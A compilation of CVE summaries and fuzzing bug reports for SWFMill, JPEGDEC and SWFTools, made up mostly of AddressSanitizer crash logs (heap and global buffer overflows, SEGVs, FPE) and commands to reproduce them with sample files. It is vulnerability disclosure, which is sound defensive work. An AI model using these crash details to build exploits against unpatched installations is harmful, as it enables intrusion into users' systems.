SWFMill commit 53d7690 was discovered to contain a heap-buffer overflow via base64_encode.

    ==55556==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000019813 at pc 0x0000005311c9 bp 0x7ffedbddc7f0 sp 0x7ffedbddc7e8
    WRITE of size 1 at 0x602000019813 thread T0
        #0 0x5311c8 in base64_encode /home/bupt/Desktop/swfmill/src/base64.c:46:10
        #1 0x5d5152 in SWF::UnknownTag::writeXML(_xmlNode*, SWF::Context*) /home/bupt/Desktop/swfmill/src/gSWFWriteXML.cpp:3881:12
        #2 0x5bc1ee in SWF::Header::writeXML(_xmlNode*, SWF::Context*) /home/bupt/Desktop/swfmill/src/gSWFWriteXML.cpp:375:11
        #3 0x53e1d2 in SWF::File::getXML(SWF::Context*) /home/bupt/Desktop/swfmill/src/SWFFile.cpp:215:11
        #4 0x53e4f0 in SWF::File::saveXML(_IO_FILE*, SWF::Context*) /home/bupt/Desktop/swfmill/src/SWFFile.cpp:239:19
        #5 0x54eebe in swfmill_swf2xml(int, char**) /home/bupt/Desktop/swfmill/src/swfmill.cpp:147:24
        #6 0x7f93171f1c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #7 0x4224d9 in _start (/home/bupt/Desktop/swfmill/src/swfmill+0x4224d9)
    
    0x602000019813 is located 0 bytes to the right of 3-byte region [0x602000019810,0x602000019813)
    allocated by thread T0 here:
        #0 0x4fa7c8 in operator new[](unsigned long) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_new_delete.cpp:102
        #1 0x5d5140 in SWF::UnknownTag::writeXML(_xmlNode*, SWF::Context*) /home/bupt/Desktop/swfmill/src/gSWFWriteXML.cpp:3879:19
        #2 0x5bc1ee in SWF::Header::writeXML(_xmlNode*, SWF::Context*) /home/bupt/Desktop/swfmill/src/gSWFWriteXML.cpp:375:11
        #3 0x53e1d2 in SWF::File::getXML(SWF::Context*) /home/bupt/Desktop/swfmill/src/SWFFile.cpp:215:11
        #4 0x53e4f0 in SWF::File::saveXML(_IO_FILE*, SWF::Context*) /home/bupt/Desktop/swfmill/src/SWFFile.cpp:239:19
        #5 0x54eebe in swfmill_swf2xml(int, char**) /home/bupt/Desktop/swfmill/src/swfmill.cpp:147:24
        #6 0x7f93171f1c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swfmill/src/base64.c:46:10 in base64_encode
    Shadow bytes around the buggy address:
      0x0c047fffb2b0: fa fa 02 fa fa fa 07 fa fa fa 02 fa fa fa 05 fa
      0x0c047fffb2c0: fa fa 02 fa fa fa 00 01 fa fa 04 fa fa fa 05 fa
      0x0c047fffb2d0: fa fa 00 03 fa fa 07 fa fa fa 00 01 fa fa 06 fa
      0x0c047fffb2e0: fa fa 07 fa fa fa 04 fa fa fa 06 fa fa fa 06 fa
      0x0c047fffb2f0: fa fa 07 fa fa fa 05 fa fa fa 05 fa fa fa 00 03
    =>0x0c047fffb300: fa fa[03]fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fffb310: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fffb320: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fffb330: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fffb340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fffb350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==55556==ABORTING

CVE-2022-36144: heap-buffer-overflow  in base64_encode · Issue #63 · djcsdy/swfmill

JPEGDEC commit be4843c was discovered to contain a global buffer overflow via ucDitherBuffer at /src/jpeg.inl.

hi, with the help of fuzzing ,I found some crash sample in this repo.  
crash sample will be offered, and to reproduce the crash info please use command ./linux/jpegdec crash_sample

**negative-size-param****sample here:**

negative-size-param-crash-sample.zip

**crash info:**

    --11053-- ERROR: AddressSanitizer: negative-size-param: (size=-555)
        #0 0x4ad750 in __asan_memcpy /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22
        #1 0x5138a0 in JPEGParseInfo /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl:1381:17
        #2 0x512866 in main /home/bupt/Desktop/JPEGDEC/linux/main.c:42:14
        #3 0x7f1585cabc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #4 0x41c109 in _start (/home/bupt/Desktop/JPEGDEC/linux/jpegdec+0x41c109)
    
    0x0000010136aa is located 6602 bytes inside of global variable 'jpg' defined in 'main.c:14:11' (0x1011ce0) of size 17864
    SUMMARY: AddressSanitizer: negative-size-param /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22 in __asan_memcpy
    ==11053==ABORTING
    

**SEGV on unknown address****sample1：**

SEGV on unknown address sample1.zip

**crash info:**

    AddressSanitizer:DEADLYSIGNAL
    --16536-- ERROR: AddressSanitizer: SEGV on unknown address 0x000050538315 (pc 0x000000519856 bp 0x000000000001 sp 0x7ffda97ee2f0 T0)
    --16536-- The signal is caused by a READ memory access.
        #0 0x519856 in TIFFSHORT /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl
        #1 0x519856 in GetTIFFInfo /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl:1191:17
        #2 0x516242 in JPEGParseInfo /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl:1425:29
        #3 0x512866 in main /home/bupt/Desktop/JPEGDEC/linux/main.c:42:14
        #4 0x7ff45c6c4c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #5 0x41c109 in _start (/home/bupt/Desktop/JPEGDEC/linux/jpegdec+0x41c109)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl in TIFFSHORT
    ==16536==ABORTING
    

**sample2:**

SEGV on unknown address sample2.zip

**crash info:**

    AddressSanitizer:DEADLYSIGNAL
    ==53466==ERROR: AddressSanitizer: SEGV on unknown address 0x000700000080 (pc 0x7f9ea1731c01 bp 0x000000014538 sp 0x7ffefc49da70 T0)
    ==53466==The signal is caused by a READ memory access.
        #0 0x7f9ea1731c01 in fseek /build/glibc-CVJwZb/glibc-2.27/libio/fseek.c:35
        #1 0x4f49d4 in seekFile /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl:645:5
        #2 0x51381a in JPEGParseInfo /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl:1375:17
        #3 0x512866 in main /home/bupt/Desktop/JPEGDEC/linux/main.c:42:14
        #4 0x7f9ea16cbc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #5 0x41c109 in _start (/home/bupt/Desktop/JPEGDEC/linux/jpegdec+0x41c109)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /build/glibc-CVJwZb/glibc-2.27/libio/fseek.c:35 in fseek
    ==53466==ABORTING
    

**global-buffer-overflow****crash sample1:**

global-buffer-overflow-crash-sample1.zip

**crash info:**

    ==53474==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000101b880 at pc 0x00000050f80b bp 0x7ffe917d20f0 sp 0x7ffe917d20e8
    WRITE of size 1 at 0x00000101b880 thread T0
        #0 0x50f80a in JPEGPutMCU8BitGray /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl:2026:26
        #1 0x50f80a in DecodeJPEG /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl:3428:17
        #2 0x51298c in JPEG_decode /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl:577:12
        #3 0x51298c in main /home/bupt/Desktop/JPEGDEC/linux/main.c:50:6
        #4 0x7f7afe6f8c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #5 0x41c109 in _start (/home/bupt/Desktop/JPEGDEC/linux/jpegdec+0x41c109)
    
    0x00000101b880 is located 1120 bytes to the right of global variable 'ucDitherBuffer' defined in 'main.c:15:9' (0x1017420) of size 16384
    SUMMARY: AddressSanitizer: global-buffer-overflow /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl:2026:26 in JPEGPutMCU8BitGray
    Shadow bytes around the buggy address:
      0x0000801fb6c0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fb6d0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fb6e0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fb6f0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fb700: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
    =>0x0000801fb710:[f9]f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fb720: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fb730: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fb740: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fb750: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fb760: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==53474==ABORTING
    info: No menu item '=' in node '(dir)Top'
    

**crash sample2：**

global-buffer-overflow-crash-sample2.zip

**crash info：**

    ==53494==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000010162f0 at pc 0x00000051b8f7 bp 0x7ffd42bca940 sp 0x7ffd42bca938
    READ of size 2 at 0x0000010162f0 thread T0
        #0 0x51b8f6 in JPEGDecodeMCU /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl:1704:22
        #1 0x4f741a in DecodeJPEG /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl:3326:20
        #2 0x51298c in JPEG_decode /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl:577:12
        #3 0x51298c in main /home/bupt/Desktop/JPEGDEC/linux/main.c:50:6
        #4 0x7fe142af9c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #5 0x41c109 in _start (/home/bupt/Desktop/JPEGDEC/linux/jpegdec+0x41c109)
    
    0x0000010162f0 is located 72 bytes to the right of global variable 'jpg' defined in 'main.c:14:11' (0x1011ce0) of size 17864
    SUMMARY: AddressSanitizer: global-buffer-overflow /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl:1704:22 in JPEGDecodeMCU
    Shadow bytes around the buggy address:
      0x0000801fac00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fac10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fac20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fac30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0000801fac40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0000801fac50: 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 f9 f9[f9]f9
      0x0000801fac60: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fac70: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fac80: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801fac90: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
      0x0000801faca0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==53494==ABORTING
    

**FPE****crash sample1：**

FPE-sample1.zip

**crash info：**

    AddressSanitizer:DEADLYSIGNAL
    
    ==53478==ERROR: AddressSanitizer: FPE on unknown address 0x0000004f6aa6 (pc 0x0000004f6aa6 bp 0x7ffd10d4a3d0 sp 0x7ffd10d49c40 T0)
        #0 0x4f6aa6 in DecodeJPEG /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl:3285:37
        #1 0x51298c in JPEG_decode /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl:577:12
        #2 0x51298c in main /home/bupt/Desktop/JPEGDEC/linux/main.c:50:6
        #3 0x7f92f93acc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #4 0x41c109 in _start (/home/bupt/Desktop/JPEGDEC/linux/jpegdec+0x41c109)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: FPE /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl:3285:37 in DecodeJPEG
    ==53478==ABORTING
    

**crash sample2：**

FPE-sample2.zip

**crash info：**

    AddressSanitizer:DEADLYSIGNAL
    
    ==53482==ERROR: AddressSanitizer: SEGV on unknown address 0x00004f4a7e15 (pc 0x000000519856 bp 0x000000000001 sp 0x7ffed5dd5f70 T0)
    ==53482==The signal is caused by a READ memory access.
        #0 0x519856 in TIFFSHORT /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl
        #1 0x519856 in GetTIFFInfo /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl:1191:17
        #2 0x516242 in JPEGParseInfo /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl:1425:29
        #3 0x512866 in main /home/bupt/Desktop/JPEGDEC/linux/main.c:42:14
        #4 0x7f5efd945c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #5 0x41c109 in _start (/home/bupt/Desktop/JPEGDEC/linux/jpegdec+0x41c109)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/JPEGDEC/linux/./../src/jpeg.inl in TIFFSHORT
    ==53482==ABORTING

CVE-2022-35003: BUGS FOUND · Issue #41 · bitbank2/JPEGDEC

SWFTools commit 772e55a2 was discovered to contain a stack overflow via __sanitizer::StackDepotNode::hash(__sanitizer::StackTrace const&) at /sanitizer_common/sanitizer_stackdepot.cpp.

CVE-2022-35111: bug report swftools-pdf2swf · Issue #184 · matthiaskramm/swftools

SWFTools commit 772e55a2 was discovered to contain a heap-buffer overflow via /bin/png2swf+0x552cea.

Hi, I currently learn to use fuzz tech to detect bugs and I found something in this repo.  
in order to reproduce the crash info, please attach ASAN when you compile this repo.

**heap buffer overflow****reproduce**

command to reproduce the crash : ./png2swf -j 50 \[sample file\] -o /dev/null

**sample file**

id0\_heap-buffer-overflow.zip

**crash info**

    ==109951==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000001c at pc 0x0000004f680f bp 0x7ffde7515f90 sp 0x7ffde7515f88
    READ of size 1 at 0x60200000001c thread T0
        #0 0x4f680e in png_read_header /home/bupt/Desktop/swftools/src/png2swf.c:184:10
        #1 0x4fbbf8 in CheckInputFile /home/bupt/Desktop/swftools/src/png2swf.c:583:9
        #2 0x4fca4e in args_callback_command /home/bupt/Desktop/swftools/src/png2swf.c:754:9
        #3 0x4fcfd4 in processargs /home/bupt/Desktop/swftools/src/./../lib/args.h:89:16
        #4 0x4fcfd4 in main /home/bupt/Desktop/swftools/src/png2swf.c:802:5
        #5 0x7fc97197cc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #6 0x41ce29 in _start (/home/bupt/Desktop/swftools/build/bin/png2swf+0x41ce29)
    
    0x60200000001c is located 0 bytes to the right of 12-byte region [0x602000000010,0x60200000001c)
    allocated by thread T0 here:
        #0 0x4af3f0 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x4f579b in png_read_chunk /home/bupt/Desktop/swftools/src/png2swf.c:127:18
        #2 0x4f5cc6 in png_read_header /home/bupt/Desktop/swftools/src/png2swf.c:170:11
        #3 0x4fbbf8 in CheckInputFile /home/bupt/Desktop/swftools/src/png2swf.c:583:9
        #4 0x4fca4e in args_callback_command /home/bupt/Desktop/swftools/src/png2swf.c:754:9
        #5 0x4fcfd4 in processargs /home/bupt/Desktop/swftools/src/./../lib/args.h:89:16
        #6 0x4fcfd4 in main /home/bupt/Desktop/swftools/src/png2swf.c:802:5
        #7 0x7fc97197cc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/src/png2swf.c:184:10 in png_read_header
    Shadow bytes around the buggy address:
      0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c047fff8000: fa fa 00[04]fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==109951==ABORTING
    
    

**reproduce**

command to reproduce the crash : ./png2swf -j 50 \[sample file\] -o /dev/null

**sample file**

id5\_heap-buffer-overflow.zip

**crash info**

    ==7560==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6190000004a1 at pc 0x000000552b5b bp 0x7ffc4a0c7730 sp 0x7ffc4a0c7728
    READ of size 1 at 0x6190000004a1 thread T0
        #0 0x552b5a in png_load /home/bupt/Desktop/swftools/lib/png.c:813:15
        #1 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6
        #2 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10
        #3 0x7fbc1782dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #4 0x41ce29 in _start (/home/bupt/Desktop/swftools/build/bin/png2swf+0x41ce29)
    
    0x6190000004a1 is located 0 bytes to the right of 1057-byte region [0x619000000080,0x6190000004a1)
    allocated by thread T0 here:
        #0 0x4af3f0 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x54bf0e in png_load /home/bupt/Desktop/swftools/lib/png.c:517:33
        #2 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6
        #3 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10
        #4 0x7fbc1782dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/png.c:813:15 in png_load
    Shadow bytes around the buggy address:
      0x0c327fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c327fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c327fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c327fff8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c327fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c327fff8090: 00 00 00 00[01]fa fa fa fa fa fa fa fa fa fa fa
      0x0c327fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c327fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c327fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c327fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c327fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==7560==ABORTING
    

**reproduce**

command to reproduce the crash : ./png2swf -j 50 \[sample file\] -o /dev/null

**sample file**

id8\_heap\_buffer\_overflow.zip

**crash info**

    ==16841==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000001b4 at pc 0x000000552ceb bp 0x7fff18453570 sp 0x7fff18453568
    READ of size 4 at 0x6020000001b4 thread T0
        #0 0x552cea in png_load /home/bupt/Desktop/swftools/lib/png.c:832:43
        #1 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6
        #2 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10
        #3 0x7f90177d9c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #4 0x41ce29 in _start (/home/bupt/Desktop/swftools/build/bin/png2swf+0x41ce29)
    
    0x6020000001b4 is located 0 bytes to the right of 4-byte region [0x6020000001b0,0x6020000001b4)
    allocated by thread T0 here:
        #0 0x4af3f0 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x55014c in png_load /home/bupt/Desktop/swftools/lib/png.c:768:19
        #2 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6
        #3 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10
        #4 0x7f90177d9c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/png.c:832:43 in png_load
    Shadow bytes around the buggy address:
      0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff8000: fa fa fd fd fa fa fd fa fa fa fd fd fa fa 00 05
      0x0c047fff8010: fa fa fd fd fa fa fd fa fa fa fd fd fa fa 00 05
      0x0c047fff8020: fa fa fd fd fa fa 03 fa fa fa fd fd fa fa fd fd
    =>0x0c047fff8030: fa fa 00 05 fa fa[04]fa fa fa fa fa fa fa fa fa
      0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==16841==ABORTING
    

**reproduce**

command to reproduce the crash : ./png2swf -j 50 \[sample file\] -o /dev/null

**sample file**

id13\_heap-buffer-overflow.zip

**crash info**

    ==39505==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x617000000378 at pc 0x000000552c2e bp 0x7fff87bf0950 sp 0x7fff87bf0948
    READ of size 4 at 0x617000000378 thread T0
        #0 0x552c2d in png_load /home/bupt/Desktop/swftools/lib/png.c:832:43
        #1 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6
        #2 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10
        #3 0x7f3352dcec86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #4 0x41ce29 in _start (/home/bupt/Desktop/swftools/build/bin/png2swf+0x41ce29)
    
    0x617000000378 is located 68 bytes to the right of 692-byte region [0x617000000080,0x617000000334)
    allocated by thread T0 here:
        #0 0x4af3f0 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x55014c in png_load /home/bupt/Desktop/swftools/lib/png.c:768:19
        #2 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6
        #3 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10
        #4 0x7f3352dcec86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/png.c:832:43 in png_load
    Shadow bytes around the buggy address:
      0x0c2e7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2e7fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2e7fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2e7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2e7fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c2e7fff8060: 00 00 00 00 00 00 04 fa fa fa fa fa fa fa fa[fa]
      0x0c2e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2e7fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2e7fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
